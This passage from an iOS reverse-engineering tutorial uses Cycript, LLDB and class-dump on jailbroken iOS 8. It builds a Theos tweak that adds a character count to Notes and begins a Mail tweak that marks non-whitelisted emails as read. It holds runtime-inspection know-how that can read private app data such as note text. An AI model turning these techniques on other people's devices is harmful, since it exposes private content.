   |    |    |    |    |    |    |    |    |    |    | <NoteTextView:  0x175ee3e0;  
baseClass  = _UICompatibilityTextView;  frame = (6 28; 308 418); text = 'Secret';  
clipsToBounds  = YES; gestureRecognizers  = <NSArray:  0x176c7ed0>;  layer = <CALayer:  
0x176d88e0>; contentOffset:  {0, 0}; contentSize:  {308, 52}> 
...... 
Look! There is a NoteTextView with the keyword “Secret ”. Call nextResponder 
continuously until we get its controller:  
cy# [#0x175ee3e0  nextResponder]  
#"<NotesScrollView:  0x17d307c0;  baseClass  = UIScrollView;  frame = (0 0; 320 568); 
clipsToBounds  = YES; gestureRecognizers  = <NSArray:  0x17e502a0>;  layer = <CALayer:  
0x17d30b60>;  contentOffset:  {0, -64}; contentSize:  {320, 251}>" 
cy# [#0x17d307c0  nextResponder]  
 
258 #"<NoteContentLayer:  0x17e505b0;  frame = (0 0; 320 568); layer = <CALayer:  0x17e50470>>"  
cy# [#0x17e505b0  nextResponder]  
#"<NotesBackgroundView:  0x17e52320;  frame = (0 0; 320 568); gestureRecognizers  = 
<NSArray:  0x17d0c940>;  layer = <CALayer:  0x17e522f0>>"  
cy# [#0x17e52320  nextResponder]  
#"<NotesDisplayController:  0x17edc340>"  
Okay, NoteDisplayController is the one. Let ’s see if setTitle: really changes the title of note 
browsing view:  
cy# [#0x17edc340  setTitle:@"Characount  = Character  count"] 
The UI after setTitle: is shown in figure 7 -7.  
 
Figure 7-  7 UI After setTitle:  
Neet! Mission 1, completed!  
7.2.4    Get the current note object from NoteDisplayController  
Strike while the iron is hot, let ’s overview NoteDisplayController.h.  
@interface  NotesDisplayController  : UIViewController  <NoteContentLayerDelegate,  
UIActionSheetDelegate,  AFContextProvider,  UIPopoverPresentationControllerDelegate,  
UINavigationControllerDelegate,  UIImagePickerControllerDelegate,  
NotesQuickLookActivityItemDelegate,  ScrollViewKeyboardResizerDelegate,  
NSUserActiv ityDelegate,  NotesStateArchiving>  
{ 
...... 
@property(nonatomic,  getter=isVisible)  BOOL visible;  // @synthesize  visible=_visible;  
- (void)loadView;  
@property(retain,  nonatomic)  NoteObject  *note; // @synthesize  note=_note;  
...... 
} 

 
259 After going over this large header, we ’ve found a property of NoteObject type. Since a note 
is exactly an object, NoteObject seems to be too obvious to believe... Hehe, let ’s print it in 
Cycript: 
cy# [#0x17edc340 note] 
#'<NoteObject: 0x176aa170> (entity: Note; id: 0x176a9040 <x-coredata://4B88CC7C- 7A5F-
4F15-9275-53C6D0ABE0C3/Note/p15>  ; data: {\n    attachments  =     (\n    );\n    author 
= nil;\n    body = "0x176a8b20  <x-coredata://4B88CC7C -7A5F-4F15-9275-
53C6D0ABE0C3/NoteBody/p15>"; \n    containsCJK  = 0;\n    contentType  = 0;\n    
creationDate  = "2014-11-24 05:00:59  +0000";\n    deletedFlag  = 0;\n    externalFlags  = 
0;\n    externalSequenceNumber  = 0;\n    externalServerIntId  = "-4294967296"; \n    guid 
= "781B6C87 -2855-4512-8864-50618754333A"; \n    integerId  = 3865;\n    isBookkeepingE ntry 
= 0;\n    modificationDate  = "2014-11-24 12:44:08  +0000";\n    serverId  = nil;\n    
store = "0x175a2b60  <x-coredata://4B88CC7C -7A5F-4F15-9275-53C6D0ABE0C3/Store/p1>"; \n    
summary = nil;\n    title = Secret;\n})' 
Needless to say, NoteObject is exactl y the current note. Each field in the description is 
explicit, let ’s take a look at its header:  
@interface NoteObject : NSManagedObject 
{ 
} 
 
- (BOOL)belongsToCollection:(id)arg1;  
@property(nonatomic)  unsigned  long long sequenceNumber;  
- (BOOL)containsAttac hments; 
@property(retain,  nonatomic)  NSString  *externalContentRef;  
@property(retain,  nonatomic)  NSData *externalRepresentation;  
@property(readonly,  nonatomic)  BOOL hasValidServerIntId;  
@property(nonatomic)  long long serverIntId;  
@property(nonatomic)  unsigned  long long flags; 
@property(readonly,  nonatomic)  NSURL *noteId;  
@property(readonly,  nonatomic)  BOOL isBeingMarkedForDeletion;  
@property(readonly,  nonatomic)  BOOL isMarkedForDeletion;  
- (void)markForDeletion;  
@property(nonatomic)  BOOL isPlainText;  
- (id)contentAsPlainTextPreservingNewlines;  
@property(readonly,  nonatomic)  NSString  *contentAsPlainText;  
@property(retain,  nonatomic)  NSString  *content;  
 
// Remaining  properties  
@property(retain,  nonatomic)  NSSet *attachments;  // @dynamic  attachments;  
@property(retain,  nonatomic)  NSString  *author;  // @dynamic  author; 
@property(retain,  nonatomic)  NoteBodyObject  *body; // @dynamic  body; 
@property(retain,  nonatomic)  NSNumber  *containsCJK;  // @dynamic  containsCJK;  
@property(retain,  nonatomic)  NSNumber  *contentTy pe; // @dynamic  contentType;  
@property(retain,  nonatomic)  NSDate *creationDate;  // @dynamic  creationDate;  
@property(retain,  nonatomic)  NSNumber  *deletedFlag;  // @dynamic  deletedFlag;  
@property(retain,  nonatomic)  NSNumber  *externalFlags;  // @dynamic  externalFlags; 
@property(retain,  nonatomic)  NSNumber  *externalSequenceNumber;  // @dynamic  
externalSequenceNumber;  
@property(retain,  nonatomic)  NSNumber  *externalServerIntId;  // @dynamic  
externalServerIntId;  
@property(readonly,  retain, nonatomic)  NSString  *guid; // @dynamic  guid; 
@property(retain,  nonatomic)  NSNumber  *integerId;  // @dynamic  integerId;  
@property(retain,  nonatomic)  NSNumber  *isBookkeepingEntry;  // @dynamic  
isBookkeepingEntry;  
@property(retain,  nonatomic)  NSDate *modificationDate;  // @dynamic  modificationDate;  
 
260 @property(retain,  nonatomic)  NSString  *serverId;  // @dynamic  serverId;  
@property(retain,  nonatomic)  NoteStoreObject  *store; // @dynamic  store; 
@property(retain,  nonatomic)  NSString  *summary;  // @dynamic  summary;  
@property(retain,  nonatomi c) NSString  *title; // @dynamic  title; 
 
@end 
Great! Lots of properties indicate that NoteObject is a very standard model. How do we get 
its text? Among its properties, we can see a possible property named contentAsPlainText. Let ’s 
check what it is:  
cy# [#0x176aa170 contentAsPlainText] 
@"Secret" 
For further confirmation, let ’s change the text of this note and add a picture, as shown in 
figure 7 -8. 
 
Figure 7-  8 Change this note  
Then call contentAsPlainText again:  
cy# [#0x176aa170  contentAsPlainText]  
@"bbs.iosre.com"  
Now we’ re certain that this method can correctly return the text of the current note. With a 
further length method, we ’re able to get the character count of this note:  
cy# [[#0x176aa170  contentAsPlainText]  length] 
13 
We’re almost done.  

 
261 7.2.5    Find a method to monitor note text changes in real time  
At the beginning of this chapter we ’ve mentioned that “this kind of methods are usually 
defined in protocols ”. Because both setTitle: and NoteObject are found in 
NotesDisplayController.h, if we can f ind the “monitor ” method inside this header too, our code 
will be greatly simplified. Open NotesDisplayController.h and check what protocols it has 
implemented.  
@interface  NotesDisplayController  : UIViewController  <NoteContentLayerDelegate,  
UIActionSheetDe legate, AFContextProvider,  UIPopoverPresentationControllerDelegate,  
UINavigationControllerDelegate,  UIImagePickerControllerDelegate,  
NotesQuickLookActivityItemDelegate,  ScrollViewKeyboardResizerDelegate,  
NSUserActivityDelegate,  NotesStateArchiving>  
...... 
@end 
Among those protocols, UIActionSheetDelegate, 
UIPopoverPresentationControllerDelegate, UINavigationControllerDelegate and 
UIImagePickerControllerDelegate are all documented, they have nothing to do with the 
changes of the current note, hence can be ignor ed. The remaining ones, i.e. 
NoteContentLayerDelegate, AFContextProvider, NotesQuickLookActivityItemDelegate, ScrollViewKeyboardResizerDelegate, NSUserActivityDelegate and NotesStateArchiving are 
worth attention, we should inspect them one by one. Let ’s start with 
NoteContentLayerDelegate -Protocol.h:  
@protocol  NoteContentLayerDelegate  <NSObject>  
- (BOOL)allowsAttachmentsInNoteContentLayer:(id)arg1;  
- (BOOL)canInsertImagesInNoteContentLayer:(id)arg1;  
- (void)insertImageInNoteContentLayer:(id)arg1;  
- (BOOL)isNoteContentLayerVisible:(id)arg1;  
- (BOOL)noteContentLayer:(id)arg1  acceptContentsFromPasteboard:(id)arg2;  
- (BOOL)noteContentLayer:(id)arg1  acceptStringIncreasingContentLength:(id)arg2;  
- (BOOL)noteContentLayer:(id)arg1  canHandleLongPressOnElement:(id)ar g2; 
- (void)noteContentLayer:(id)arg1  containsCJK:(BOOL)arg2;  
- (void)noteContentLayer:(id)arg1  contentScrollViewWillBeginDragging:(id)arg2;  
- (void)noteContentLayer:(id)arg1  didChangeContentSize:(struct  CGSize)arg2;  
- (void)noteContentLayer:(id)arg1  handleLongPressOnElement:(id)arg2  atPoint:(struct  
CGPoint)arg3;  
- (void)noteContentLayer:(id)arg1  setEditing:(BOOL)arg2  animated:(BOOL)arg3;  
- (void)noteContentLayerContentDidChange:(id)arg1  updatedTitle:(BOOL)arg2;  
- (BOOL)noteContentLayerShouldBeginEditing:(id)arg1;  
 
@optional  
- (void)noteContentLayerKeyboardDidHide:(id)arg1;  
@end 
2 methods are quite suspecious, they ’re noteContentLayer:didChangeContentSize: and 
noteContentLayerContentDidChange:updatedTitle:. While w e are editing a note, the content 
 
262 and size of it are indeed changing, thus those 2 methods may be called when changes occur, and 
actually they ’re implemented in NotesDisplayController.h. Let ’s use LLDB to make sure they ’re 
called when a note changes.  
Attach to MobileNotes with LLDB, and check its ASLR offset:  
(lldb) image list -o -f 
[  0] 0x00035000  
/private/var/db/stash/_.29LMeZ/Applications/MobileNotes.app/MobileNotes(0x00000000000390
00) 
[  1] 0x00197000  /Library/MobileSubstrate/MobileSubstrate.dylib(0x00 00000000197000)  
[  2] 0x06db3000  /Users/snakeninny/Library/Developer/Xcode/iOS  DeviceSupport/8.1  
(12B411)/Symbols/System/Library/Frameworks/QuickLook.framework/QuickLook  
...... 
The ASLR offset is 0x35000. Drag and drop MobileNotes into IDA, then check the base 
addresses of [NotesDisplayController noteContentLayer:didChangeContentSize:] and 
[NotesDisplayController noteContentLayerContentDidChange:updatedTitle:] after the initial 
analysis, as shown in figure 7 -9 and figure 7 -10.
 
Figure7-  9 [NotesDisplayContr oller noteContentLayer:didChangeContentSize:]  
 
Figure7-  10 [NotesDisplayController noteContentLayerContentDidChange:updatedTitle:]  
The base addresses are 0x16E70 and 0x1AEB8 respectively, so breakpoints should be set at 
0x4BE70 and 0x4FEB8. Then try to edit a note and see whether these breakpoints are triggered:  
(lldb) br s -a 0x4BE70 
Breakpoint  1: where = MobileNotes`___lldb_unnamed_function382$$MobileNotes,  address = 
0x0004be70  
(lldb) br s -a 0x4FEB8 
Breakpoint  2: where = MobileNotes`___lldb_unnamed_fu nction458$$MobileNotes,  address = 
0x0004feb8  
Great eyes see alike: These two breakpoints are hit a lot! The reason a protocol method gets 
called is generally that the corresponding event mentioned in the method name happened. And 

 
263 what triggers the event is usually the method’ s arguments. In this case, [NotesDisplayController 
noteContentLayer:didChangeContentSize:] and [NotesDisplayController 
noteContentLayerContentDidChange:updatedTitle:] are called because didChangeContentSize 
and ContentDidChange events  happened, and content itself is probably the arguments of both 
methods. Let ’s verify our guess in LLDB.  
(lldb) br com add 1 
Enter your debugger command(s).  Type 'DONE' to end. 
> po $r2 
> c 
> DONE 
(lldb) br com add 2 
Enter your debugger  command(s).   Type 'DONE' to end. 
> po $r2 
> c 
> DONE 
(lldb) c 
We can see quite a few occurrences of NoteContentLayer:  
Process 24577 resuming  
Command #2 'c' continued  the target. 
<NoteContentLayer:  0x14ecdf50;  frame = (0 0; 320 568); animations  = 
{ bounds.origin=<CABasicAni mation: 0x16fee090>;  bounds.size=<CABasicAnimation:  
0x16fee4a0>;  position=<CABasicAnimation:  0x16fee500>;  }; layer = <CALayer:  0x14eca900>>  
Process 24577 resuming  
Command #2 'c' continued  the target. 
<NoteContentLayer:  0x14ecdf50;  frame = (0 0; 320 568); animations  = 
{ bounds.origin=<CABasicAnimation:  0x16fee090>;  bounds.size=<CABasicAnimation:  
0x16fee4a0>;  position=<CABasicAnimation:  0x16fee500>;  }; layer = <CALayer:  0x14eca900>>  
Process 24577 resuming  
Command #2 'c' continued  the target. 
<NoteContentLaye r: 0x14ecdf50;  frame = (0 0; 320 568); layer = <CALayer:  0x14eca900>>  
Process 24577 resuming  
Command #2 'c' continued  the target. 
If NoteContentLayer comes, can NoteContent be far behind? Let ’s search in 
NoteContentLayer.h for NoteContent:  
@interface  NoteContentLayer  : UIView <NoteTextViewActionDelegate,  
NoteTextViewLayoutDelegate,  UITextViewDelegate>  
...... 
@property(retain,  nonatomic)  NoteTextView  *textView;  // @synthesize  textView=_textView;  
...... 
@end 
There ’s a property of NoteTextView type in NoteContentLayer. In the beginning of this 
chapter, we have printed the view hierarchy of note browsing view in Cycript, and found the 
note text was displayed right on a NoteTextView. So, let ’s change the commands on the 
breakpoints and print NoteTextView:  
(lldb) br com add 1 
Enter your debugger  command(s).   Type 'DONE' to end. 
> po [$r2 textView]      
 
264 > c 
> DONE 
(lldb) br com add 2 
Enter your debugger  command(s).   Type 'DONE' to end. 
> po [$r2 textView]  
> c 
> DONE 
Continue editing this note and keep watchi ng the output. Our editing shows in the output 
in real time:  
Process 24577 resuming  
Command #2 'c' continued  the target. 
<NoteTextView:  0x15aace00;  baseClass  = _UICompatibilityTextView;  frame = (6 28; 308 
209); text = 'Secre';  clipsToBounds  = YES; gestureRecognizers  = <NSArray:  0x14eddfc0>;  
layer = <CALayer:  0x14ee7da0>;  contentOffset:  {0, 0}; contentSize:  {308, 52}> 
Process 24577 resuming  
Command #2 'c' continued  the target. 
<NoteTextView:  0x15aace00;  baseClass  = _UICompatibilityTextView;  frame = (6 28; 308 
209); text = 'Secret';  clipsToBounds  = YES; gestureRecognizers  = <NSArray:  0x14eddfc0>;  
layer = <CALayer:  0x14ee7da0>;  contentOffset:  {0, 0}; contentSize:  {308, 52}> 
One last step is to get “text” from NoteTextView. Open NoteTextView.h:  
@interface NoteTextView : _UICompatibilityTextView <UIGestureRecognizerDelegate> 
{ 
    id <NoteTextViewActionDelegate>  _actionDelegate;  
    id <NoteTextViewLayoutDelegate>  _layoutDelegate;  
 ...... 
} 
...... 
@property(nonatomic)  __weak id <NoteTextViewActionDelegate>  actionDelegate;  // 
@synthesize  actionDelegate=_actionDelegate;  
...... 
@property(nonatomic)  __weak id <NoteTextViewLayoutDelegate>  layoutDelegate;  // 
@synthesize  layoutDelegate=_layoutDelegate;  
...... 
@end 
There ’s not much content in this header, and there ’re only 2 delegates with the keyword 
“text”. Obviously, delegates don ’t return NSString objects. If we cannot get text in 
NoteTextView, it gets to be in NoteTextView ’s super class. Open _UICompatibilityTextView 
then: 
@interface  _UICompatibilityTextView  : UIScrollView  <UITextLinkInteraction,  UITextInput>  
...... 
@property(nonatomic)  int textAlignment;  
@property(copy,  nonatomic)  NSString  *text; 
- (BOOL)hasText;  
@property(retain,  nonatomic)  UIColor *textColor;  
@property(retain,  nonatomic)  UIFont *font; 
@property(c opy, nonatomic)  NSAttributedString  *attributedText;  
...... 
OK, here comes NSString *text. Let ’s use LLDB for a final confirmation:  
(lldb) br com add 1 
Enter your debugger  command(s).   Type 'DONE' to end. 
 
265 > po [[$r2 textView]  text] 
> c 
> DONE 
(lldb) br com add 2 
Enter your debugger  command(s).   Type 'DONE' to end. 
> po [[$r2 textView]  text] 
> c 
> DONE 
Secret  
Process 24577 resuming  
Command #2 'c' continued  the target. 
Secret i 
Process 24577 resuming  
Command #2 'c' continued  the target. 
By now, we ’ve successful ly found 2 methods to monitor note text changes in real time, you 
can choose either of them, and [NotesDisplayController 
noteContentLayerContentDidChange:updatedTitle:] is my choice. All 3 previous problems are 
solved, iOS reverse engineering is way easier  than you originally thought, isn ’t it? 
7.3   Result interpretation  
The mission of this chapter is to reverse a stock App, Notes. We ’ve successfully prototyped 
the tweak with only Cycript and LLDB, and actually we can replace LLDB with Theos too. You may call it  luck and it ’s true that reverse engineering depends on fortune. To rewrite 
Characount for Notes 8, the general thoughts are as follows.  
1.   Find a proper location on UI and a method to display the character count  
Upgrading from iOS 6 to iOS 8 eliminates Notes ’ title, where is a good place to display the 
character count. In this chapter, we ’ve cut into the code from the note browsing view and got 
NoteDisplayController with Cycript, therefore managed to solve the 1st problem.  
2.   Browse the class-dump headers and find methods in controller to access 
model 
Accessing model via controller conforms to MVC design pattern, which Apple made Apps 
should apply. Therefore, NoteDisplayController should be able to access note objects. By just 
looking through headers and examini ng some suspicious properties with Cycript, we ’ve got 
NoteObject, thus got the character count of a note.  
 
266 3.   Find protocol methods to monitor note text changes in real time  
Event related methods with keywords like “did” or “will”  are often defined in protoco ls. 
Due to the high readability of Objective -C methods ’ names, we didn ’t use IDA or LLDB to find 
methods that meet our needs, but instead went over all headers with the keyword “protocol ”. 
With a 1st round filtering by header names and a 2nd round filtering by LLDB, we’ ve found our 
target methods. This is the charm of reverse engineering, regardless of fortune or guess.  
7.4   Tweak writing  
This example is relatively easy, all operations can be done inside the class 
NotesDisplayController.  
7.4.1   Create tweak project "CharacountforNotes 8" using Theos  
The Theos commands are as follows:  
snakeninnys- MacBook:Code snakeninny$ /opt/theos/bin/nic.pl 
NIC 2.0 - New Instance Creator 
------------------------------  
  [1.] iphone/application  
  [2.] iphone/cydget  
  [3.] iphone/framework  
  [4.] iphone/library  
  [5.] iphone/notification_center_widget  
  [6.] iphone/preference_bundle  
  [7.] iphone/sbsettingstoggle  
  [8.] iphone/tool  
  [9.] iphone/tweak  
  [10.] iphone/xpc_service  
Choose a Template  (required):  9 
Project Name (required):  CharacountForNotes8  
Package Name [com.yourcompany.characountfornotes8]:  com.naken.characountfornotes8  
Author/Maintainer  Name [snakeninny]:  snakeninny  
[iphone/tweak]  MobileSubstrate  Bundle filter [com.apple.springboard]:  
com.apple.mobilenot es           
[iphone/tweak]  List of applications  to terminate  upon installation  (space-separated,  '-' 
for none) [SpringBoard]:  MobileNotes   
Instantiating  iphone/tweak  in characountfornotes8/...  
Done. 
7.4.2   Compose CharacountForNotes8.h  
The finalized CharacountF orNotes8.h looks like this:  
@interface  NoteObject  : NSObject  
@property  (readonly,  nonatomic)  NSString  *contentAsPlainText;  
@end 
 
@interface  NoteTextView  : UIView 
@property  (copy, nonatomic)  NSString  *text; 
@end 
 
267  
@interface  NoteContentLayer  : UIView 
@property  (retain,  nonatomic)  NoteTextView  *textView;  
@end 
 
@interface  NotesDisplayController  : UIViewController  
@property  (retain,  nonatomic)  NoteContentLayer  *contentLayer;  
@property  (retain,  nonatomic)  NoteObject  *note; 
@end 
This header is composed by picking snippets from other class -dump headers. The existence 
of this header is simply for avoiding any warnings or errors when compiling the tweak.  
7.4.3  Edit Tweak.xm  
The finalized Tweak.xm looks like this:  
#import "CharacountForNotes8.h"  
 
%hook NotesDisplayController  
- (void)viewWillAppear:(BOOL)arg1  // Initialze  title 
{ 
 %orig; 
 NSString  *content  = self.note.contentAsPlainText;  
 NSString  *contentLength  = [NSString  stringWithFormat:@"%lu",  (unsigned  
long)[content  length]];  
 self.title  = contentLe ngth; 
} 
 
- (void)viewDidDisappear:(BOOL)arg1  // Reset title 
{ 
 %orig; 
 self.title  = nil; 
} 
 
- (void)noteContentLayerContentDidChange:(NoteContentLayer  *)arg1 
updatedTitle:(BOOL)arg2  // Update title 
{ 
 %orig; 
 NSString  *content  = self.contentLayer.textView. text; 
 NSString  *contentLength  = [NSString  stringWithFormat:@"%lu",  (unsigned  
long)[content  length]];  
 self.title  = contentLength;  
} 
%end 
7.4.4  Edit Makefile  and control files  
The finalized Makefile looks like this:  
export THEOS_DEVICE_IP  = iOSIP 
export ARCHS = armv7 arm64 
export TARGET = iphone:clang:latest:8.0  
 
include theos/makefiles/common.mk  
 
TWEAK_NAME  = CharacountForNotes8  
CharacountForNotes8_FILES  = Tweak.xm  
 
268  
include $(THEOS_MAKE_PATH)/tweak.mk  
 
after-install::  
 install.exec  "killall  -9 MobileNotes"  
The finalized control looks like this:  
Package:  com.naken.characountfornotes8  
Name: CharacountForNotes8  
Depends:  mobilesubstrate,  firmware  (>= 8.0) 
Version:  1.0 
Architecture:  iphoneos -arm 
Description:  Add a character  count to Notes 
Maintainer : snakeninny  
Author: snakeninny  
Section:  Tweaks 
Homepage:  http://bbs.iosre.com  
7.4.5  Test 
After packaging and installing Characount for Notes 8, let’ s test it by editing a random note 
and see if the character count changes in real time, as shown in figure 7 -11 to figure 7 -17. 
 
269  
Figure 7-  11 Characount for Notes 8  
 
Figure 7-  12 Characount for Notes 8  

 
270  
Figure 7-  13 Characount for Notes 8  
 
Figure 7-  14 Characount for Notes 8  

 
271  
Figure 7-  15 Characount for Notes 8  
 
Figure 7-  16 Characount for Notes 8  

 
272  
Figure 7-  17 Characount for Notes 8  
It works as we expected.  
7.5   Conclusion  
As a veteran on iOS, Notes is simple yet popular, a great number of  people use this App 
frequently  in their daily lives. Characount for Notes 8 is so simple that we don ’t even need 
advanced reverse engineering tools to finish the whole project, I hope you don ’t have difficulty 
reading this chapter. It ’s energy- and- time- consuming to learn assembly -level reverse engineering 
when you are not familiar with IDA and LLDB, I suggest beginne rs carry out some simple 
reverse engineering projects just like the example in this chapter first. In this way, not only can 
you form a thinking pattern of reverse engineering, but also gain a sense of achievement, so 
why not get your hands dirty right now ? 
  

273  
Practice 2: Mark user specific emails as read automatically  
 
  
8.1   Mail 
Email is one of the most popular communication channels in the era of Internet. Many 
people send and receive emails every day. Although there are lots of good email Apps on 
AppStore, such as Sparrow, Inbox, etc, they are not as highly integrated as the stock Mail App 
(hereafter  referred to as  Mail). Therefore, Mail is still the top choice during my daily life.  
Among all emails we receive every day, most of them are valueless subscription emails like 
notifications and advertisements, which comes from our inadvertently clicks of subscriptions on 
various websites, as shown in figure 8 -1. 
  
Figure 8-  1 Mail 
These emails always make me entangled. If we are kind enough to not think of them as 
spam messages, they are actually distracting our attention. However, if we mark them as spam 
8 
  
 
274 messages, we may miss some useful information. So how to deal with these messages can be a 
real headache. I have an idea that we c an add a whitelist feature to Mail, which saves our 
frequent contacts. Other emails outside whitelist will be marked as read automatically. With this 
solution, we can highlight the most valuable messages while not missing any useful information, 
as shown in figure 8- 2. 
  
Figure 8-  2 Mark messages outside whitelist as read  
Our task for this chapter is to finish this tweak. We can divide the task into following 2 
steps. 
•  Add a button on the Mail UI and present an editable whitelist after pressing the button in order to 
add or delete entries in whitelist. 
•  Every time the inbox get refreshed, mark all emails outside whitelist as read.  
Simple and clear, let ’s get started. All operations in this chapter are carried out on iPhone 5, 
iOS 8.1.1.  
8.2   Tweak prototyping  
The initial view of Mail is shown in figure 8 -3. 

 
275   
Figure 8-  3 Initial view of Mail  
Where should we place the whitelist button for a better user -experience? In the “ All 
Inboxes”  view in figure 8 -3, we can see that the left bottom corner is blank; maybe we can put 
the button here. Let ’s try it out and the effect is shown in figure 8 -4. 
  
Figure 8-  4 Add whitelist button at the left bottom corner  
Although the whitelist button is aligned with the compose button in right bottom corner, 

 
276 the former is text and the latter is an icon. They are in different forms and looks inharmonious. 
Therefore, we can see the left bottom corner is not suitable for text button. How about 
changing it to an icon? The problem is that there isn ’t an accustomed icon to represent whitelist, 
while a random one may cause confusion. So in this view, no matter icon or text we use, we 
cannot get both understandability and harmony. Let ’s click “Mailboxes ” and go to the upper 
view, as shown in figure 8- 5. 
  
Figure 8-  5 Mailboxes 
The top left and bottom left areas are both empty, as shown in figure 8 -5. The bottom left is 
not suitable for the whitelist button as we ’ve discusse d just now. So let ’s put the button on top 
left corner to see how it looks, as shown in figure 8 -6. 

 
277   
Figure 8-  6 Add whitelist button at top left corner  
Not bad, this is it. To customize the view like figure 8 -6, we just need to find the controller 
of “Mailboxes ” view and then add the button by calling [controller.navigationItem 
setLeftBarButtonItem:]. We have repeated the process of finding C from V for m any times 
previously and it has been proved as a feasible solution. After we know how to add the button, 
we can try to implement the function of whitelist. It can be divided into three steps.  
1)  Get all emails.  
2)  Extract their senders ’ addresses.  
3)  Mark them as read according to whitelist.  
Let’s analyze them step by step, hope you can still catch up.  
How can we get all emails? As we know, we can pull to refresh the inbox, as shown in figure 
8-7. 

 
278   
Figure 8- 7 Pull to refresh  
During refreshing, Mail will fetch all latest emails from mail servers. After refreshing, the UI 
will restore to the normal state as shown in figure 8 -3, and at this moment, we ’ve got all emails. 
As long as we can catch the refresh completion event and read the inbox after that, we can get 
all emails. Therefore, we can divide “getting all emails ” into 2 steps: first, try to capture the 
refresh completion event; second, read the inbox. Normally, the refresh completion event handler would be a callback method in some protocols. So when analyzing t he class -dump 
headers, we should pay attention to whether there are protocol methods with keywords like “didRefresh” , “didUpdate”  or “didReload ” in their names. By hooking such methods and read 
the inbox after their execution, we’ ll be able to get all emai ls. 
An email is an object and it is generally abstracted as a class. From this class, we can extract 
information like the receiver, sender, title, content and whether it is read. If we can get this 
object, we can finish the second and third step together. 
The overall ideas are not complicated, let ’s realize them one by one.  
8.2.1  Locate and class -dump Mail ’s executable  
We can easily locate the executable of Mail, “/Applications/MobileMail.app/MobileMail ”, 
using “ps”. Since Mail is a stock App on iOS, it is  not encrypted and we can class -dump it directly 
without decryption:  

 
279 snakeninnys -MacBook:~ snakeninny$ class -dump -S -s -H 
/Users/snakeninny/Code/iOSSystemBinaries/8.1.1_iPhone5/MobileMail.app/MobileMail -o 
/Users/snakeninny/Code/iOSPrivateHeaders/8.1.1/Mo bileMail  
There ’re 393 headers in total, as shown in figure 8 -8. 
  
Figure 8-  7 class- dump headers  
8.2.2  Import headers into Xcode 
The search and code highlighting features in Xcode are competent to present lots of 
headers, as shown in figure 8- 9. 

 
280   
Figure 8-  8 Import headers into Xcode  
Next, let’ s start to find the point to cut into code from UI.  
8.2.3   Find the controller of “Mailboxes ” view using Cycript  
Firstly, use recursiveDescription to print out the view hierarchy of “Mailboxes ” view, as 
shown below:  
FunMaker -5:~ root# cycript -p MobileMail  
cy# ?expand  
expand == true  
cy# [[UIApp keyWindow] recursiveDescription]  
@"<UIWindow: 0x156bffe0; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 
0x156bd390>; layer = <UIWindowLayer: 0x156c1be0>>  
   | <UIView: 0x15611490; frame = (0 0; 320 568); autoresize = W+H; gestureRecognizers = 
<NSArray: 0x15618e70>; layer = <CALayer: 0x15611420>>  
   |    | <UIView: 0x1 5611210; frame = (0 0; 320 568); layer = <CALayer: 0x15611280>>  
   |    |    | <_MFActorItemView: 0x15614660; frame = (0 0; 320 568); layer = <CALayer: 
0x15614840>>  
   |    |    |    | <UIView: 0x156150f0; frame = ( -0.5 -0.5; 321 569); alpha = 0; layer 
= <CALayer: 0x15615160>>  
   |    |    |    | <_MFActorSnapshotView: 0x15614bb0; baseClass = UISnapshotView; frame 
= (0 0; 320 568); clipsToBounds = YES; hidden = YES; layer = <CALayer: 0x15614e00>>  
   |    |    |    |    | <UIView: 0x15614f40; frame = ( -1 -1; 322 570); layer = 
<CALayer: 0x15614fb0>>  
   |    |    |    | <UILayoutContainerView: 0x1572ec40; frame = (0 0; 320 568); 
clipsToBounds = YES; autoresize = LM+W+RM+TM+H+BM; layer = <CALayer: 0x1572ecc0>>  
   |    |    |    |    | <UIView: 0x1683d890; frame = (0 0; 320 0); layer = <CALayer: 
0x16848140>>  
   |    |    |    |    | <UILayoutContainerView: 0x157246b0; frame = (0 0; 320 568); 
clipsToBounds = YES; gestureRecognizers = <NSArray: 0x156088e0>; layer = <CALayer: 
0x15724890>>  
...... 

 
281    |    |    |    |    |    |    |    |    |    | <MailboxTableCell: 0x1572ad50; 
baseClass = UITableViewCell; frame = (0 28; 320 44.5); autoresize = W; layer = <CALayer: 
0x168299f0>>  
   |    |    |    |    |    |    |    |    |    |    | <UITableViewCellCo ntentView: 
0x16829b70; frame = (0 0; 286 44); gestureRecognizers = <NSArray: 0x1682b060>; layer = 
<CALayer: 0x16829be0>>  
   |    |    |    |    |    |    |    |    |    |    |    | <UILabel: 0x1682b0a0; frame 
= (55 12; 84.5 20.5); text = ‘All Inboxes’; use rInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x1682b160>>  
...... 
The text of the UILabel at the bottom is “All Inboxes ”, indicating its corresponding 
MailBoxTableCell is the top one in figure 8 -5. Keep calling nextResponder until we get the 
controller:  
cy# [#0x1572ad50 nextResponder] 
#"<UITableViewWrapperView: 0x1572fe60; frame = (0 0; 320 568); gestureRecognizers = 
<NSArray: 0x15730370>; layer = <CALayer: 0x157301a0>; contentOffset: {0, 0}; 
contentSize: {320, 568}>"  
cy# [#0x1572fe60 nextResponder]  
#"<UITableView: 0x1585a000; frame = (0 0; 320 568); clipsToBounds = YES; autoresize = 
W+H; gestureRecognizers = <NSArray: 0x1572fa20>; layer = <CALayer: 0x1572f540>; 
contentOffset: {0, -64}; contentSize: {320, 371}>"  
cy# [#0x1585a000 nextResponder]  
#"<MailboxPic kerController: 0x156e9260>"  
Aha. It ’s very easy to get MailboxPickerController. Let ’s try whether we can add a 
leftBarButtonItem: 
cy# #0x156e9260.navigationItem.leftBarButtonItem = 
#0x156e9260.navigationItem.rightBarButtonItem  
#"<UIBarButtonItem: 0x15729f 00>" 
The effect is shown in figure 8 -10. 
 
282   
Figure 8-  9 After setLeftBarButtonItem:  
No problem! We ’ve successfully added the button. Therefore, we can confirm that 
MailboxPickerController is the controller of “Mailboxes ” view.  
8.2.4   Find the delegate of “All Inboxes ” view using Reveal and 
Cycript  
After adding the whitelist button, we need to implement the function of it. First let ’s take a 
look at how to capture the refresh completion event. Since the event is straightly showed on 
“All Inboxes ” view, it is very likely that the callback method is defined in the delegate of this 
view. Now let ’s turn to “All Inboxes ” view in figure 8 -3 and use Reveal rather than repeating 
what we’ ve done with Cycript in section 8.2.3, to locate a cell o f this view, and then turn back to 
Cycript to find its associated UITableView as well delegate. 
With Reveal, we can easily locate the top cell, as shown in figure 8 -11. 

 
283   
Figure 8-  10 See the view hierarchy using Reveal  
MailboxContentViewCell is the cell class to show the sender, title and summary of an email. 
Next, we use Cycript to find its associated UITableView. Since we know there must be at least 
one MailboxContentViewCell object in current view, we can try to find these cells through 
